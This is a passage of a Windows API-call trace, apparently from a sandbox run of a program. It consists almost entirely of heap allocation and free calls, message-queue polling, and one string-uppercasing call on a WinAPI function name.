hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0179.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0179.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0179.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0179.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0179.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0179.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0179.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0179.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0179.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0179.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0179.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0179.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0179.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0179.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0179.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0179.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0179.260] FreeLibrary (hLibModule=0x75c90000) returned 1 [0179.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0179.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0179.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0179.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0179.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0179.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0179.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0179.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0179.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0179.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0179.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0179.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0179.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0179.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0179.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0179.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0179.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0179.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0179.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0179.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0179.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0179.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0179.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0179.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0179.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0179.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0179.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0179.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0179.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0179.261] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0179.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0179.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0179.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0179.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0179.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0179.261] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0179.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0179.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0179.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0179.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0179.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0179.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0179.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0179.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0179.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0179.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0179.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0179.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0179.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0179.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0179.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0179.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0179.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0179.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0179.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0179.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0179.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0179.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0179.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0179.262] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0179.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0179.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0179.262] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0179.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0179.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0179.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0179.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b00 [0179.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0179.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0179.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0179.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0179.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0179.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1770 [0179.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0179.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0179.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0179.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b60 [0179.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0179.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0179.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0179.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd840 [0179.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0179.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0179.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0179.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0179.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0179.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0179.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0179.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0179.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0179.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0179.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0179.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0179.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0179.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0179.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0179.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0179.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0179.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0179.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0179.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0179.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0179.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0179.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0179.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0179.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0179.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0179.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0179.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0179.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0179.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0179.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0179.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0179.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0179.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0179.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0179.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0179.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0179.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0179.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0179.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0179.264] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0179.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0179.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0179.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0179.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0179.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0179.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0179.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0179.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0179.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0179.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0179.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0179.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0179.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0179.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0179.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0179.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0179.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0179.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0179.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0179.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0179.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0179.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0179.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0179.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0179.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0179.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0179.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0179.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0179.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0179.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0179.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0179.265] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0179.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0179.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0179.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0179.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0179.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0179.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0179.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0179.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0179.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0179.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0179.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0179.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0179.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0179.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0179.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0179.266] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0179.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0179.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0179.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0179.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0179.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0179.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0179.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0179.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0179.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0179.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0179.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0179.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0179.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0179.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0179.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0179.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0179.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba378 [0179.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0179.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd738 [0179.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba2e8 [0179.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9b50 [0179.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd480 [0179.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0179.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9a60 [0179.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba4f8 [0179.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0179.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda68 [0179.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0179.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0179.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd510 [0179.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0179.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0179.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0179.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0179.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0179.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0179.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0179.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0179.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0179.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0179.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0179.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0179.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: 